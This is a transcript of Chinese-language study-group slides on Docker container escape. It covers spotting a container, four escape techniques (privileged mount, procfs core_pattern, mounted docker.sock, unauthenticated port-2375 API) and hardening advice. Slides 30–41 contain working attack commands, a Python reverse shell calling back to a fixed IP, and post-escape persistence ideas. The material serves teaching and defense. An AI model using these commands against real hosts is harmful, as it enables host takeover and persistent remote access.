Docker Escape@HackerSir StudyGroup

Transcript

1. Docker 逃逸 2024/10/11 by yukai

2. Docker? 逃逸? 01 辨識 Docker 環境 02 Docker 逃逸 03

   防止 Docker 逃逸 04 Outline

3. Docker? 逃逸? 01

4. Docker 逃逸 的本質 • Docker：經由 Cgroup / Namespace 限制權限的 process

   • Docker 逃逸 在有限權限的 process 逃逸到更多權限的 process，可以視 為一種提權方式

5. Namespace • 作用：隔離 process 之間的系統資源 • 實現效果：容器與容器隔離、容器與宿主機隔離 • EX：PID 、User、Mount、Network、UTS

   (namespace)

6. Cgroups • 作用：根據程式對資源的請求觸發相應的 hook • 實現效果：對容器資源的分配、限制和管理

7. Capabilities • 作用：細分權限功能 • 實現效果：提高容器的安全性，落實最小權限原則

8. Capabilities cat proc/1/status | grep Cap

9. Capabilities capsh --decode=000001fffffffff | grep -i NET_ADMIN

10. 辨識 Docker 環境 02 How to TCPdump effectively in Docker

11. 常見的檢驗方式 • .dockerenv • /proc/1/cgroup • Container 環境變數 • Use

    mount / fdisk command • PID 1 process name

12. .dockerenv ls -alh / | grep .dockerenv • user 權限過小，則有可能無法看到

    .dockerenv • Ex：www-data

13. /proc/1/cgroup grep –i docker /proc/1/cgroup cat /proc/1/cgroup | grep -qi

    docker && echo "In Docker" || echo "Not Docker"

14. Container 環境變數 env | grep –i hostname

15. Use mount / fdisk command mount | grep -i docker

    fdisk –l 容器內：沒有輸出結果（特權容器除外）

16. PID 1 process name ps -aux

17. Docker 逃逸 03

18. Docker 逃逸的情境 • Docker 配置不當（setting、mount） • Docker 本身的服務漏洞 • Linux

    Kernel 漏洞

19. 配置不當 – 誤用參數導致隔離失效 --privileged：容器內的 root 權限 = 宿主機上的 root 權限

    --net=host：容器與宿主機在同一個 Network namespace --pid=host：容器與宿主機在同一個 PID namespace --volume /:/host：宿主機根目錄被掛載到容器內部 權限隔離 網路隔離 行程隔離 文件檔案隔離

20. Case1：Privilged 特權容器逃逸 1. 滲透進 privileged docker container 2. 掛載宿主機目錄並切換根目錄

21. How to check privileged? cat /proc/self/status |grep Cap 特權模式下 非特權模式下

22. 如何逃逸 mkdir test && mount /dev/sde test fdisk -l chroot

    test

23. 逃逸之後？ • crontab config file：反彈排程 shell • /root/.ssh/authorized_keys：ssh 連線 •

    /root/.bashrc：bashrc shell 利用

24. Case2：掛載宿主機 procfs 逃逸 1. 滲透進掛載 procfs 的 container 2. 將

    reverse shell 放入目標的 proc 目錄 3. 觸發 core dumped

25. Procfs • 也就是 Linux 路徑下的 /proc 虛擬檔案系統 • 動態生成並記錄系統、process 的狀態

26. core_pattern & core dump • /proc/sys/kernel/core_pattern • 設置系統在 process 崩潰時生成

    core dump 的文件路徑格式 echo "/tmp/core-%e.%p" > /proc/sys/kernel/core_pattern

27. Enable core dumps ulimit -S -c 1000 ulimit -S -c

    unlimited [my-program-to-troubleshoot] • /etc/security/limits.conf：所有的限制設定檔 • -S／-H：軟限制 / 硬限制，-c：core dump file 的大小 • 沒有限定容量（unlimited），後面是指定的程式

28. Enable core dumps • -a：列出目前出所有的限制 ulimit -S -a

29. 如何逃逸 find / -name core_pattern apt-get update -y && apt-get

    install vim gcc -y

30. 如何逃逸 echo -e "|$host_path/[shell 路徑] \rcore" > /host/proc/sys/kernel/core_pattern 準備一個觸發 core

    dump 的程式 準備一個 reverse shell 的程式 執行崩潰程式並反彈 shell host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)

31. 如何逃逸 #!/usr/bin/env python3 import os, pty, socket host = "192.168.159.128"

    port = 4445 def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) os.putenv("HISTFILE", '/dev/null') pty.spawn("/bin/bash") s.close() if __name__ == "__main__": main() Python reverse shell

32. 如何逃逸 #include<stdio.h> int main(void) { int *a = NULL; *a

    = 1; return 0; } C Code Use to cause core dump

33. 測試結果

34. Case3：掛載 Docker Socket 1. 滲透進掛載 Docker Socket 的 container 2.

    容器內創建一個掛載宿主機根目錄的新容器（DinD） 3. 進入新容器後切換根目錄

35. Docker and Dockerd Docker Daemon (Dockerd) Docker Daemon Docker CLI

    UNIX Socket (/var/run/docker.sock) TCP 1、unix:///var/run/docker.sock 2、tcp://host:port 3、fd://socketfd

36. 如何逃逸 docker run -it -v /var/run/:/host/var/run/ ubuntu /bin/bash find /

    -name docker.sock apt update && apt-get install -y docker.io docker -H unix:///host/var/run/docker.sock run -v /:/aa -it ubuntu:14.04 /bin/bash

37. Case4：Docker Remote API 未授權存取 1. 檢測某 IP 的 2375(2376) port

    是否授權 2. 建立特權容器並連接（DinD） 3. 掛載宿主機目錄並切換根目錄

38. 如何切換通訊方式 vim /lib/systemd/system/docker.service [Service] ExecStart= ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

    systemctl daemon-reload && service docker restart

39. 檢測 2375 port 是否授權 curl http://[IP]:2375/info docker -H tcp://[IP]:2375 ps

    docker -H tcp://[IP]:2375 images 方法一 方法二

40. 檢測 2375 port 是否授權 方法三 IP=`hostname -i | awk -F.

    '{print $1 "." $2 "." $3 ".1"}' ` && wget http://$IP:2375 Example：在容器中找 host IP

41. 如何逃逸 docker -H tcp:/[IP] run -itd --name ubuntu --privileged ubuntu:16.04

    /bin/bash docker -H tcp://[IP] exec -it ubuntu /bin/bash mkdir test && mount /dev/vda1 test chroot test

42. Docker 本身的服務漏洞 Docker Client Docker Daemon Containerd-shim Containerd Containerd-shim Containerd-shim

    runc runc runc application application application Socket gRPC

43. 近期 CVE 相關的容器漏洞 • CVE-2024-21626：不安全的配置 • CVE-2024-0132：不安全的配置 • CVE-2022-0492：不安全的配置 •

    CVE-2021-30465：docker 服務漏洞 • CVE-2021-25741：docker 服務漏洞

44. Tools For Container Escape • CDK：自動收集可用資訊、並提供自動逃逸的各種功能 • Linpeas：搜尋可能路徑的提權腳本 • Amicontained：取得權限並找到逃逸方法的工具

    • Deepce：收集並逃逸的工具 • Grype：取得 images 中安裝的軟體中所包含的 CVE

45. 防止 Docker 逃逸 04

46. 防止 Docker 逃逸 – 版本更新 • Docker 版本 >= 19.03.1

    • K8s 集群版本 >= 1.12 • Linux kernel >= 4.14

47. 防止 Docker 逃逸 – 運行注意 • 不使用 root 權限運行 Docker

    服務 • 不以 privileged 啟動 Docker • 不將宿主機目錄掛載到容器目錄 • 不使用 --cap-add=SYSADMIN 將容器啟用

48. 資料來源 • Docker 容器逃逸 – 奇安信攻防社區 • Docker 逃逸 CVE-2019-5736、procfs

    雲安全漏洞復現 • Docker 逃逸漏洞總匯 • 深入高可用系統原理與設計 • Hack Tricks - Docker Breakout / Privilege Escalation • Understand and configure core dumps on Linux
49. None